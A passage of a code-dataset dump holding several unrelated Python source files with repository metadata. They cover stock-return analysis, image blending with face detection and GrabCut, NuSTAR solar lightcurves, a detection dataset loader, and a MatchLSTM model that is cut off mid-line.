bin_file.seek(float_end+1) #skip floating-marker-byte \\x08 (end)\n bin_read = bin_file.read()\n datastring += bin_read.decode('utf-8')\n # print(\"data-string:\\n %s\" %datastring)\n\n# Reconstructing byte-data into dictionary\ndata_reconstructed = ast.literal_eval(datastring)\nprint('data.utf: David:', data_reconstructed['David'])\nans = data_reconstructed['David'][0] + data_reconstructed['David'][6]\nprint('1 + 7 = ', ans)\nprint('data.utf: a list:', data_reconstructed['a list'])\nprint('data.utf: z[:12]:', data_reconstructed['z'][:12])\nprint('data.utf: z[2]+z[-1]: %s' %(data_reconstructed['z'][2] + data_reconstructed['z'][-1]))\nprint('data.utf: x:', data_reconstructed['x'])\nprint('data.utf: y:', data_reconstructed['y'])\n\n# including f_dict of floating-list as char-list\ndata.update(f_dict)\ndatas = str(data)\n# print(\"\\nSerialized Data (Length: %s): %s\" %(len(datas), datas))\nwith open('data.utfc', 'wb') as utfile:\n utfile.write(datas.encode('utf-8'))\nprint('\\nAfter inserting f_dict as char-list, data.utfc: ', os.path.getsize('data.utfc'), 'bytes (utf-8 encoding)')\nprint('whose size is way larger if we have huge list of numbers!\\n')\n","repo_name":"takehuge/Notes","sub_path":"LoaData.py","file_name":"LoaData.py","file_ext":"py","file_size_in_byte":7971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14698775298","text":"# Statistical analysis of time series\n# https://classroom.udacity.com/courses/ud501/lessons/4156938722/concepts/45439393860923\n\n\"\"\"\nGlobal statistics:\n mean: http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.mean.html\n median: http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.median.html\n std: http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.std.html\n sum: http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.sum.html\n [more]: http://pandas.pydata.org/pandas-docs/stable/api.html#api-dataframe-stats\n\nRolling statistics:\n rolling_mean: http://pandas.pydata.org/pandas-docs/stable/generated/pandas.rolling_mean.html (Deprecated)\n rolling_std: http://pandas.pydata.org/pandas-docs/stable/generated/pandas.rolling_std.html (Deprecated)\n [more]:http://pandas.pydata.org/pandas-docs/stable/computation.html?highlight=rolling%20statistics#moving-rolling-statistics-moments\n Updated function example: https://stackoverflow.com/questions/50313698/pandas-rolling-mean-not-working\n\nDocument on how to import functions from other files in python (and nice explanation on objects OOP):\n https://www.csee.umbc.edu/courses/331/fall10/notes/python/python3.ppt.pdf\n\n Pycon 2010 webpage: http://us.pycon.org/2010/conference/schedule/event/50/\n\"\"\"\n\"\"\"Bollinger Bands.\"\"\"\n\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef symbol_to_path(symbol, base_dir=\"C:\\\\Users\\\\aroom\\\\Documents\\\\Data\\\\tickers_data\\\\\"):\n \"\"\"Return CSV file path given ticker symbol.\"\"\"\n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))\n\n\ndef get_data(symbols, dates):\n \"\"\"Read stock data (adjusted close) for given symbols from CSV files.\"\"\"\n df = pd.DataFrame(index=dates)\n if 'SPY' not in symbols: # add SPY for reference, if absent\n symbols.insert(0, 'SPY')\n\n for symbol in symbols:\n df_temp = pd.read_csv(symbol_to_path(symbol), index_col='Date',\n parse_dates=True, usecols=['Date', 'Adj Close'], na_values=['nan'])\n df_temp = df_temp.rename(columns={'Adj Close': symbol})\n df = df.join(df_temp)\n if symbol == 'SPY': # drop dates SPY did not trade\n df = df.dropna(subset=[\"SPY\"])\n\n return df\n\n\ndef plot_data(df, title=\"Stock prices\", xlabel=\"Date\", ylabel=\"Price\"):\n \"\"\"Plot stock prices with a custom title and meaningful axis labels.\"\"\"\n ax = df.plot(title=title, fontsize=12)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n plt.show()\n return\n\n\ndef get_rolling_mean(values, window):\n \"\"\"Return rolling mean of given values, using specified window size.\"\"\"\n return values.rolling(window=window, center=False).mean()\n\n\ndef get_rolling_std(values, window):\n \"\"\"Return rolling standard deviation of given values, using specified window size.\"\"\"\n # DONE: Compute and return rolling standard deviation\n return values.rolling(window=window, center=False).std()\n\n\ndef get_bollinger_bands(rm, rstd):\n \"\"\"Return upper and lower Bollinger Bands.\"\"\"\n # DONE: Compute upper_band and lower_band\n upper_band = rm + 2 * rstd\n lower_band = rm - 2 * rstd\n return upper_band, lower_band\n\n\ndef compute_daily_returns(df):\n \"\"\"Compute and return the daily return values.\"\"\"\n # http://us.pycon.org/2010/conference/schedule/event/50/\n # DONE: Your code here\n # Note: Returned DataFrame must have the same number of rows\n df_tmp = df.pct_change()\n df_tmp.iloc[0, :] = 0\n return df_tmp\n\n\ndef compute_cumulative_returns(df):\n \"\"\"Compute and return the daily return values.\"\"\"\n # http://us.pycon.org/2010/conference/schedule/event/50/\n # DONE: Your code here\n # Note: Returned DataFrame must have the same number of rows\n # Solution taken from https://stackoverflow.com/questions/40811246/pandas-cumulative-return-function\n # df.ix[\"Cumulative\"] = ((df.fillna(0) + 1).cumprod() - 1).iloc[-1] # This gives only one value per column, is not a column of Cumulative returns\n # df_tmp.iloc[0, :] = 0\n # Solution taken from https://stackoverflow.com/questions/40204396/plot-cumulative-returns-of-a-pandas-dataframe\n df_tmp = ((df + 1).cumprod() - 1)\n return df_tmp\n\n\ndef test_run():\n # Read data\n dates = pd.date_range('2012-01-01', '2012-12-31')\n symbols = ['SPY']\n df = get_data(symbols, dates)\n\n #######################################################################\n # Compute Bollinger Bands\n #######################################################################\n # 1. Compute rolling mean\n rm_SPY = get_rolling_mean(df['SPY'], window=20)\n\n # 2. Compute rolling standard deviation\n rstd_SPY = get_rolling_std(df['SPY'], window=20)\n\n # 3. Compute upper and lower bands\n upper_band, lower_band = get_bollinger_bands(rm_SPY, rstd_SPY)\n\n # Plot raw SPY values, rolling mean and Bollinger Bands\n ax = df['SPY'].plot(title=\"Bollinger Bands\", label='SPY')\n rm_SPY.plot(label='Rolling mean', ax=ax)\n upper_band.plot(label='upper band', ax=ax)\n lower_band.plot(label='lower band', ax=ax)\n\n # Add axis labels and legend\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Price\")\n ax.legend(loc='upper left')\n plt.show()\n\n #######################################################################\n # Compute daily returns\n #######################################################################\n # Read data\n dates = pd.date_range('2012-07-01', '2012-07-31') # one month only\n symbols = ['SPY', 'XOM']\n df = get_data(symbols, dates)\n plot_data(df)\n\n # Compute daily returns\n daily_returns = compute_daily_returns(df)\n plot_data(daily_returns, title=\"Daily returns\", ylabel=\"Daily returns\")\n\n #######################################################################\n # Compute cumulative returns\n #######################################################################\n # Read data\n dates = pd.date_range('2012-01-01', '2012-12-31') # whole 2012\n symbols = ['SPY']\n df = get_data(symbols, dates)\n plot_data(df)\n\n # Compute daily returns\n daily_returns = compute_daily_returns(df)\n\n # Compute cumulative returns\n cum_returns = compute_cumulative_returns(daily_returns)\n plot_data(cum_returns, title=\"Cumulative returns\", ylabel=\"Cumulative returns\")\n\n\nif __name__ == \"__main__\":\n test_run()\n","repo_name":"xiaxio/UdacityMachineLearningForTrading","sub_path":"Lesson_05.py","file_name":"Lesson_05.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"18720648099","text":"\nclass formatResponse():\n\n @staticmethod\n def single(descriptions, data):\n response = {}\n columns = [col[0] for col in descriptions]\n for key in range(len(columns)):\n response[columns[key]] = data[key]\n return response\n \n @staticmethod\n def multiple(descriptions, data):\n response = {}\n responseArray = []\n columns = [col[0] for col in descriptions]\n for item in range(len(data)):\n for key in range(len(columns)):\n response[columns[key]] = data[item][key]\n responseArray.append(response)\n return responseArray\n","repo_name":"Oluwasegun-AA/pipit","sub_path":"flask/app/helpers/formatResponse.py","file_name":"formatResponse.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"30394868942","text":"import os\n\nimport numpy as np\nimport torch\nfrom PIL import Image\nfrom sklearn.preprocessing import LabelEncoder\nfrom torch.utils.data import Dataset\n\nfrom Meta import MetaName, MetaLabel, MetaBBox\nfrom models.defects.utils import box2imgsize_box, transform\n\n\nclass GetterBase(Dataset):\n def __init__(self, keep_difficult=False):\n \"\"\"\n :param data_folder: folder where data files are stored\n :param keep_difficult: keep or discard objects that are considered difficult to detect?\n \"\"\"\n\n self.keep_difficult = keep_difficult\n\n def __getitem__(self, i):\n # Read image\n image = Image.open(self.images[i], mode='r')\n image = image.convert('RGB')\n\n # Read objects in this image (bounding boxes, labels, difficulties)\n objects = self.objects[i]\n boxes = torch.FloatTensor(objects['boxes']) # (n_objects, 4)\n labels = torch.tensor(objects['labels']) # (n_objects)\n difficulties = torch.ByteTensor(objects['difficulties']) # (n_objects)\n\n # Apply transformations\n image, boxes, labels, difficulties = transform(image, boxes, labels, difficulties, split=self.split)\n meta_labels = MetaLabel(labels=labels.detach().numpy(), confidence=np.array([1] * labels.shape[0]))\n meta_boxes = MetaBBox(points=boxes, label_info=meta_labels)\n\n return {'image': image, MetaName.META_BBOX.value: meta_boxes}\n\n def __len__(self):\n return len(self.images)\n\n def collate_fn(self, batch):\n \"\"\"\n Since each image may have a different number of objects, we need a collate function (to be passed to the DataLoader).\n\n This describes how to combine these tensors of different sizes. We use lists.\n\n Note: this need not be defined in this Class, can be standalone.\n\n :param batch: an iterable of N sets from __getitem__()\n :return: a tensor of images, lists of varying-size tensors of bounding boxes, labels, and difficulties\n \"\"\"\n\n images = list()\n boxes = list()\n labels = list()\n difficulties = list()\n\n for b in batch:\n images.append(b[0])\n boxes.append(b[1])\n labels.append(b[2])\n difficulties.append(b[3])\n\n images = torch.stack(images, dim=0)\n\n return images, boxes, labels, difficulties\n\n\nclass DefectsModelDataset(GetterBase):\n\n def __init__(self, data_folder, split, anno_postfix: str, img_postfix: str, keep_difficult=False,\n label_aux: int = 0):\n super().__init__(data_folder)\n\n self.split = split.upper()\n self.anno_postfix = anno_postfix\n self.img_postfix = img_postfix\n assert self.split in {'TRAIN', 'TEST', 'VALID', 'TEMPLATES'}\n self.label_aux = label_aux\n\n self.data_folder = data_folder\n self.keep_difficult = keep_difficult\n\n self.le = LabelEncoder()\n self.get_classes(data_folder)\n self.objects, self.anno_list = self.get_objects(data_folder)\n self.images = self.get_images()\n\n assert len(self.images) == len(self.objects)\n\n def get_images(self):\n images = list()\n for anno in self.anno_list:\n img_path = self.__anno2img_path(anno)\n if os.path.exists(img_path):\n images.append(img_path)\n return images\n\n def get_classes(self, path: str):\n anno_path = os.path.join(path, 'bboxes')\n annos = os.listdir(anno_path)\n labels = list()\n for anno in annos:\n full_anno_path = os.path.join(anno_path, anno)\n img_path = self.__anno2img_path(full_anno_path)\n if not os.path.exists(img_path):\n continue\n with open(full_anno_path, 'r') as f:\n\n for line in f.readlines():\n info = line.strip().split()\n labels.append(info[0])\n self.le.fit(labels)\n\n def get_objects(self, path: str):\n anno_path = os.path.join(path, 'bboxes')\n annos = os.listdir(anno_path)\n objects = list()\n annos_list = list()\n for anno in annos:\n full_anno_path = os.path.join(anno_path, anno)\n img_path = self.__anno2img_path(full_anno_path)\n if not os.path.exists(img_path):\n continue\n with open(full_anno_path, 'r') as f:\n boxes = list()\n labels = list()\n difficulties = list()\n\n for line in f.readlines():\n info = line.strip().split()\n box = [float(box.replace(',', '.')) for box in info[1:]]\n box = box2imgsize_box(img_path, box)\n boxes.append(box)\n labels.append(info[0])\n difficulties.append(0)\n if len(boxes) != 0:\n labels = np.array(self.le.transform(labels))\n labels = (labels + self.label_aux).tolist()\n objects.append({'boxes': boxes, 'labels': labels, 'difficulties': difficulties})\n annos_list.append(full_anno_path)\n\n return objects, annos_list\n\n def __anno2img_path(self, anno_path: str) -> str:\n return anno_path.replace(self.anno_postfix, self.img_postfix).replace('bboxes', self.split)\n","repo_name":"MLFreelib/cvflow","sub_path":"models/defects/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5334,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"39376743975","text":"\"\"\"\nThe FriendBlend pipeline\n\"\"\"\n\nimport logging\nimport sys\nfrom concurrent.futures import ThreadPoolExecutor\nfrom multiprocessing.pool import Pool\nimport os\n\nimport cv2 as cv\nimport numpy as np\nfrom rich.logging import RichHandler\n\nfrom friendblend.processing.alpha_blending import alpha_blend\nfrom friendblend.processing.color_correction import apply_clahe\nfrom friendblend.processing.face_body_detection import get_bounds\nfrom friendblend.processing.grab_cut import grab_cut\nfrom friendblend.processing.keypoint import ORB, filter_keypoints, find_homography\nfrom friendblend.processing import helpers as processing_helpers\nfrom friendblend.helpers import log_all_methods, log_all_in_module\nfrom friendblend import global_vars\n\nimport friendblend\n\nlog_all_in_module(friendblend.processing.color_correction)\nlog_all_in_module(friendblend.processing.face_body_detection)\nlog_all_in_module(friendblend.processing.keypoint)\nlog_all_in_module(friendblend.processing.alpha_blending)\nlog_all_in_module(friendblend.processing.grab_cut)\n\n\ndef _process_blend(img):\n \"\"\"\n only functions at module level are pickle-able\n multiprocessing involves pickling stuff so this had to be a top-level function\n \"\"\"\n return Blend._process_blend(img)\n\n\n@log_all_methods()\nclass Blend:\n \"\"\"\n Blend two images with friends into one\n \"\"\"\n\n def __init__(self, img1_path: str, img2_path: str):\n self.log = logging.getLogger()\n self.img1 = Blend.resize(self.imload(img1_path, ensure_success=True), 900, None)\n self.img2 = Blend.resize(\n self.imload(img2_path, ensure_success=True), 900, self.img1.shape[0]\n )\n self.intermediate_imgs = []\n\n def imload(\n self, img_path, mode: int = 1, ensure_success: bool = False\n ) -> np.ndarray:\n \"\"\"\n Loads an image\n Dies if ensure_success is true and image read error occurs\n \"\"\"\n im = cv.imread(img_path, mode)\n\n if im is None:\n self.log.error(\"Couldn't load image at '%s'\", img_path)\n\n if ensure_success:\n self.log.error(\"ensure_success set, dying\")\n sys.exit(1)\n\n return im\n\n @staticmethod\n def resize(img: np.ndarray, w: int, h: int) -> np.ndarray:\n \"\"\"\n Resizes image to (w, h)\n \"\"\"\n if h is None and w is None:\n return img\n\n if h is None:\n r = img.shape[1] / w\n h = img.shape[0] / r\n elif w is None:\n r = img.shape[0] / h\n w = img.shape[1] / r\n\n return cv.resize(img, (int(w), int(h)), interpolation=cv.INTER_CUBIC)\n\n @staticmethod\n def color_correction(img, clip_limit=3.0, n_bins=256, grid=(7, 7)):\n \"\"\"\n Color correction using CLAHE\n \"\"\"\n\n return apply_clahe(img, clip_limit=clip_limit, n_bins=n_bins, grid=grid)\n\n @staticmethod\n def get_face_body_bounds(img):\n \"\"\"\n Calculates face and body bounds\n \"\"\"\n return get_bounds(img)\n\n @staticmethod\n def get_homography(img1, img2, bb1, bb2):\n \"\"\"\n Calculates and filters ORB descriptors\n \"\"\"\n\n def _get_orb_features(img, bb1, bb2):\n \"\"\"\n Returns filtered ORB keypoints and descriptors\n \"\"\"\n orb = ORB(img)\n kps = orb.get_keypoints()\n filtered_kps = filter_keypoints(bb1, bb2, kps)\n ds = orb.get_descriptors(filtered_kps)\n\n return filtered_kps, ds\n\n with ThreadPoolExecutor() as executor:\n t1 = executor.submit(_get_orb_features, img1, bb1, bb2)\n t2 = executor.submit(_get_orb_features, img2, bb1, bb2)\n\n kps1, ds1 = t1.result()\n kps2, ds2 = t2.result()\n\n H, matched_img = find_homography(kps1, ds1, kps2, ds2, img1, img2)\n\n return H, matched_img\n\n @staticmethod\n def _process_blend(img):\n \"\"\"\n 1. color corrects image\n 2. extracts face and body bounding boxes\n\n Returns\n - color corrected image\n - face and\n - body bounds an image with the bounds drawn\n \"\"\"\n # color correct images\n color_corrected = Blend.color_correction(img)\n\n # get face and body bounds\n face_bounds, body_bounds = Blend.get_face_body_bounds(color_corrected)\n\n illustrated_bounds = processing_helpers.draw_box(color_corrected, face_bounds)\n illustrated_bounds = processing_helpers.draw_box(\n illustrated_bounds, body_bounds\n )\n\n return color_corrected, face_bounds, body_bounds, illustrated_bounds\n\n def order_images(self, img1, img2, fb1, fb2, bb1, bb2, boxed1, boxed2):\n \"\"\"\n Orders images and related variables such that the first image has face on the left\n \"\"\"\n # initial guess\n imgs = [img1, img2]\n fbs = [fb1, fb2]\n bbs = [bb1, bb2]\n boxeds = [boxed1, boxed2]\n\n if bb1[0] > bb2[0]:\n self.img2, self.img1 = self.img1, self.img2\n self.log.info(\"Swapping image order\")\n imgs.reverse()\n fbs.reverse()\n bbs.reverse()\n boxeds.reverse()\n\n return (*imgs, *fbs, *bbs, *boxeds)\n\n @staticmethod\n def get_alpha_blend(img_l, img_r, bb_l, bb_r):\n \"\"\"\n blends the images using alpha blending\n \"\"\"\n return alpha_blend(img_l, img_r, bb_l, bb_r)\n\n @staticmethod\n def get_grabcut_order(img1, img2, fb1, fb2, bb1, bb2):\n \"\"\"\n orders the images such that\n \"\"\"\n # initial guess\n img_l, img_r = img1, img2\n bb_l, bb_r = bb1, bb2\n fb_l, fb_r = fb1, fb2\n\n # Compare size of face bounding boxes\n if fb1[2] * fb1[3] < fb2[2] * fb2[3]:\n img_l, img_r = img2, img1\n bb_l, bb_r = bb2, bb1\n fb_l, fb_r = fb2, fb1\n\n # returns image with larger face bounding box as first image\n return img_l, img_r, fb_l, fb_r, bb_l, bb_r\n\n @staticmethod\n def get_grabcut(img_l, img_r, fb_l):\n return grab_cut(img_l, img_r, fb_l)\n\n def blend(self):\n \"\"\"\n Performs the FriendBlend algorithm\n \"\"\"\n p = Pool(2)\n r1, r2 = p.map(_process_blend, [self.img1, self.img2])\n\n cc1, fb1, bb1, boxed1 = r1\n cc2, fb2, bb2, boxed2 = r2\n\n cc1, cc2, fb1, fb2, bb1, bb2, boxed1, boxed2 = self.order_images(\n cc1, cc2, fb1, fb2, bb1, bb2, boxed1, boxed2\n )\n\n self.intermediate_imgs.extend([cc1, cc2, boxed1, boxed2])\n\n # compute homography (uses ORB)\n H, matched_img = Blend.get_homography(cc1, cc2, bb1, bb2)\n\n self.intermediate_imgs.append(matched_img)\n\n warp_img = cv.warpPerspective(cc1, H, cc1.shape[:2][::-1])\n\n self.intermediate_imgs.append(warp_img)\n\n if bb2[0] - (bb1[0] + bb1[2]) > 100:\n self.log.info(\"Using Alpha Blending to merge the images\")\n blended = Blend.get_alpha_blend(warp_img, cc2, bb1, bb2)\n\n try:\n # :(\n os.remove(\"../images/outputs/6-grabcut.png\")\n except:\n pass\n\n else:\n self.log.info(\"Using GrabCut to merge the images\")\n img_l, img_r, bb_l, bb_r, fb_l, fb_r = Blend.get_grabcut_order(\n warp_img, cc2, bb1, bb2, fb1, fb2\n )\n grabcut_img, blended = Blend.get_grabcut(img_l, img_r, fb_l)\n\n self.intermediate_imgs.append(grabcut_img)\n\n file_names = [\n \"cc1.png\",\n \"cc2.png\",\n \"bb1.png\",\n \"bb2.png\",\n \"keypoints.png\",\n \"warped.png\",\n \"grabcut.png\",\n ]\n\n for i in range(len(self.intermediate_imgs)):\n cv.imwrite(\n \"../images/outputs/\" + str(i) + \"-\" + file_names[i],\n self.intermediate_imgs[i],\n )\n\n return blended, self.intermediate_imgs\n\n\nglobal_vars.initialize()\nif __name__ == \"__main__\":\n logging.basicConfig(\n level=logging.DEBUG,\n format=\"%(message)s\",\n handlers=[RichHandler(rich_tracebacks=True, show_time=False, show_path=False)],\n )\n log = logging.getLogger()\n\n if len(sys.argv) != 3:\n log.warning(\n \"Please provide name of the images. (inside `images` directory at repo root).\"\n \" Using default images as fallback for demonstration\"\n )\n\n img1_path = \"../images/chaarminar/chaarminar-5.jpg\"\n img2_path = \"../images/chaarminar/chaarminar-3.jpg\"\n else:\n img1_path = f\"../images/{sys.argv[1]}\"\n img2_path = f\"../images/{sys.argv[2]}\"\n\n blend, _ = Blend(img1_path, img2_path).blend()\n cv.imwrite(\"../images/outputs/final-blended.png\", blend)\n","repo_name":"yoogottamk/Intelligent-Image-Composition","sub_path":"src/friendblend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8784,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"7796975048","text":"# Make lightcurve of NuSTAR evt solar data, both FPMA and FPMB \n# and return pandas dataframe (optionally can save to csv as well)\n# \n# Only does any other filtering (xy, det_id) if engery filtering\n# \n# If det_id is given then xy_range is ignored\n# \n# If no outfile given then no .csv file created\n# \n# Default return livetime and rates, lvt=False will return/save rate only\n# \n# In theory could do using astropy.table.Table with\n# from astropy.table import Table\n# t=Table.read(maindir+nsid+'/hk/nu'+nsid+fpm+'_fpm.hk',hdu=1).to_pandas()\n# but doesn't load header info so can't convert the time, so have to do more manual fit.open() \n# \n# 24-Sep-2022 IGH\n# -----------------------------------\n\nfrom astropy.io import fits\nimport astropy.time as atime\nimport astropy.units as u\n\nimport numpy as np\n\nimport nustar_pysolar as nustar\nimport pandas as pd\n\nimport warnings\nwarnings.simplefilter('ignore')\n\n# ------------------------------------------\n# Do livetime and rate per FPM\ndef nsrate_df(maindir='',nsid='',clid='',outfile='',\\\n englow=0,enghigh=0,xy_range=[],det_id='',lvt=True):\n\n fpm='A'\n hdulist = fits.open(maindir+nsid+'/event_cl/nu'+nsid+fpm+clid+'.evt')\n evda=hdulist[1].data\n hdra = hdulist[1].header\n hdulist.close()\n\n hdulist = fits.open(maindir+nsid+'/hk/nu'+nsid+fpm+'_fpm.hk')\n lda=hdulist[1].data\n lhdra = hdulist[1].header\n hdulist.close()\n\n fpm='B'\n hdulist = fits.open(maindir+nsid+'/event_cl/nu'+nsid+fpm+clid+'.evt')\n evdb=hdulist[1].data\n hdrb = hdulist[1].header\n hdulist.close()\n\n hdulist = fits.open(maindir+nsid+'/hk/nu'+nsid+fpm+'_fpm.hk')\n ldb=hdulist[1].data\n lhdrb = hdulist[1].header\n hdulist.close()\n\n # Sort out the time index of the livetimes\n mjdref=atime.Time(hdra['mjdrefi'],format='mjd')\n ltimsa=atime.Time(mjdref+lda['time']*u.s,format='mjd')\n ltimsb=atime.Time(mjdref+ldb['time']*u.s,format='mjd')\n\n # If not englow or enghigh specified don't filter the evt\n if (englow!=0) and (enghigh!=0):\n if (len(xy_range)==4):\n evda=nustar.filter.event_filter(evda,fpm='A',energy_low=englow, energy_high=enghigh,hdr=hdra,xy_range=xy_range)\n evdb=nustar.filter.event_filter(evdb,fpm='B',energy_low=englow, energy_high=enghigh,hdr=hdrb,xy_range=xy_range)\n else:\n if (det_id != ''):\n evda=nustar.filter.event_filter(evda,fpm='A',energy_low=englow, energy_high=enghigh,hdr=hdra,dets_id=det_id)\n evdb=nustar.filter.event_filter(evdb,fpm='B',energy_low=englow, energy_high=enghigh,hdr=hdrb,dets_id=det_id)\n else:\n evda=nustar.filter.event_filter(evda,fpm='A',energy_low=englow, energy_high=enghigh)\n evdb=nustar.filter.event_filter(evdb,fpm='B',energy_low=englow, energy_high=enghigh)\n\n\n timsa=atime.Time(mjdref+evda['time']*u.s,format='mjd')\n timsb=atime.Time(mjdref+evdb['time']*u.s,format='mjd')\n\n # Use the 1sec time binning of the livetime for the binning of the counts\n tda=(timsa-ltimsa[0]).sec\n tdb=(timsb-ltimsb[0]).sec\n\n # Time bin edges should be same for A and B\n tdedgs=(ltimsa-ltimsa[0]).sec\n\n # hisotgram number of events per the livetime 1s bins\n cnta, bea=np.histogram(tda,bins=tdedgs)\n cntb, beb=np.histogram(tdb,bins=tdedgs)\n rta=cnta/lda['LIVETIME'][:-1]\n rtb=cntb/ldb['LIVETIME'][:-1]\n\n # turn it into a pandas dataframe\n if lvt:\n dfl=pd.DataFrame(np.array([lda['LIVETIME'][:-1],ldb['LIVETIME'][:-1],rta,rtb]).T, \\\n index=ltimsa.datetime[:-1], columns=['lvta','lvtb','rta','rtb'])\n else:\n dfl=pd.DataFrame(np.array([rta,rtb]).T, \\\n index=ltimsa.datetime[:-1], columns=['rta','rtb'])\n\n # truncate to time range of the evt file\n # Start/End round up/down to nearest 1s\n mint=atime.Time(min(timsa[0].isot,timsb[0].isot),format='isot',precision=0) + 1*u.s\n maxt=atime.Time(max(timsa[-1].isot,timsb[-1].isot),format='isot',precision=0) - 1*u.s\n dflt=dfl.truncate(mint.isot,maxt.isot)\n\n # save out\n if outfile != '':\n dflt.to_csv(outfile)\n \n return dflt","repo_name":"ianan/nustar_sac","sub_path":"python/nsltc_df.py","file_name":"nsltc_df.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"40886813004","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torch import cuda\n\nfrom modules import *\n\n\nclass Embed(nn.Module):\n def __init__(self, vocab_size, embed_dim):\n super(Embed, self).__init__()\n self.embed_dim = embed_dim\n self.embed = nn.Embedding(vocab_size, self.embed_dim)\n\n def forward(self, doc, qry):\n doc = self.embed(doc)\n qry = self.embed(qry)\n\n return doc, qry\n\n\nclass Encoder(nn.Module):\n def __init__(self, embed_dim, hidden_dim, num_layers, bidirectional):\n super(Encoder, self).__init__()\n self.embed_dim = embed_dim\n self.hidden_dim = hidden_dim\n self.bidirectional = bidirectional\n self.num_layers = num_layers\n\n self.gru = nn.GRU(self.embed_dim, self.hidden_dim, batch_first=True, num_layers=num_layers,\n bidirectional=bidirectional)\n\n def forward(self, doc, qry, doc_h0, qry_h0):\n batch_size = doc.size(0)\n\n qry_h, _ = self.gru(qry, qry_h0)\n doc_h, _ = self.gru(doc, doc_h0)\n\n return doc_h, qry_h\n\n def init_hidden(self, batch_size, bidirectional=False):\n hidden = next(self.parameters()).data\n if bidirectional == False:\n return Variable(hidden.new(self.num_layers, batch_size, self.hidden_dim).zero_())\n else:\n return Variable(hidden.new(self.num_layers * 2, batch_size, self.hidden_dim).zero_())\n\n\nclass MatchLSTM(nn.Module):\n def __init__(self, hidden_dim, cuda=True):\n super(MatchLSTM, self).__init__()\n self.hidden_dim = hidden_dim\n self.cuda = cuda\n\n self.initprev = InitPrev(self.hidden_dim)\n self.attn = AttnLayer(self.hidden_dim)\n self.lstm_stack = nn.ModuleList([MatchCell(self.hidden_dim) for _ in range(2)])\n self.linear = nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2)\n\n def forward(self, doc_h, qry_h, dm, qm):\n \"\"\"\n doc_h: B x D x 2*H // qry_h: B x Q x 2*H\n dm: B x D // qm: B x Q\n \"\"\"\n batch_size = doc_h.size(0)\n doc_len = doc_h.size(1)\n\n if self.cuda:\n hr_r = Variable(torch.zeros(batch_size, doc_len, self.hidden_dim * 2)).cuda()\n hr_l = Variable(torch.zeros(batch_size, doc_len, self.hidden_dim * 2)).cuda()\n else:\n hr_r = Variable(torch.zeros(batch_size, doc_len, self.hidden_dim * 2))\n hr_l = Variable(torch.zeros(batch_size, doc_len, self.hidden_dim * 2))\n\n for i in range(doc_len):\n if i == 0:\n prev_hr = self.initprev(qry_h, qm) # B x 2*H\n\n alpha = self.attn(doc_h[:, i, :], qry_h, prev_hr, qm) # B x Q x 1\n prev_hr = self.lstm_stack[0](doc_h[:, i, :], qry_h, prev_hr, alpha) # B x 2*H\n hr_r[:, i, :] = prev_hr.unsqueeze(1) # B x 1 x 2*H\n\n for i in reversed(range(doc_len)):\n if i == doc_len - 1:\n prev_hr = self.initprev(qry_h, qm)\n\n alpha = self.attn(doc_h[:, i, :], qry_h, prev_hr, qm)\n prev_hr = self.lstm_stack[1](doc_h[:, i, :], qry_h, prev_hr, alpha)\n hr_l[:, i, :] = prev_hr.unsqueeze(1)\n\n hr = torch.cat((hr_r, hr_l), 2)\n hr = self.linear(to_2D(hr, self.hidden_dim * 4))\n hr = to_3D(hr, batch_size, self.hidden_dim * 2)\n\n return hr\n\n\nclass LSTMLayer(nn.Module):\n def __init__(self, hidden_dim, bidirectional):\n super(LSTMLayer, self).__init__()\n self.hidden_dim = hidden_dim\n self.bidirectional = bidirectional\n self.num_layers = 1\n self.gru = nn.GRU(self.hidden_dim * 2, self.hidden_dim, num_layers=self.num_layers, dropout=0.2,\n batch_first=bidirectional, bidirectional=True)\n\n def forward(self, hr, hr_h0):\n \"\"\"\n hr: B x D x 2*H\n \"\"\"\n batch_size = hr.size(0)\n hr_h, _ = self.gru(hr, hr_h0)\n\n return hr_h\n\n def init_hidden(self, batch_size, bidirectional=False):\n hidden = next(self.parameters()).data\n if bidirectional == False:\n return Variable(hidden.new(self.num_layers, batch_size, self.hidden_dim).zero_())\n else:\n return Variable(hidden.new(self.num_layers * 2, batch_size, self.hidden_dim).zero_())\n\n\nclass AnsPtr(nn.Module):\n def __init__(self, hidden_dim, cuda=True):\n super(AnsPtr, self).__init__()\n self.hidden_dim = hidden_dim\n self.cuda = cuda\n\n self.initprev = InitPrev(self.hidden_dim)\n self.attn = AnsAttnLayer(self.hidden_dim)\n self.out = OutputLayer(self.hidden_dim)\n self.ptr = PtrNet(self.hidden_dim)\n\n def forward(self, hr, qry_h, dm, qm):\n '''\n hr: B x D x 2*H\n qry_h: B x Q x 2*H\n '''\n batch_size = hr.size(0)\n doc_len = hr.size(1)\n\n if self.cuda:\n output = Variable(torch.zeros(batch_size, doc_len, 2)).cuda()\n else:\n output = Variable(torch.zeros(batch_size, doc_len, 2))\n\n for i in range(2):\n if i == 0:\n prev_ha = self.initprev(qry_h, qm) # B x 2*H\n\n Fi = self.attn(hr, prev_ha, dm) # B x D x H\n beta = self.out(Fi) # B x D\n\n if i == 0:\n output[:, :, i] = beta\n beta = F.softmax(beta)\n beta = padded_attn(beta, dm)\n prev_ha = 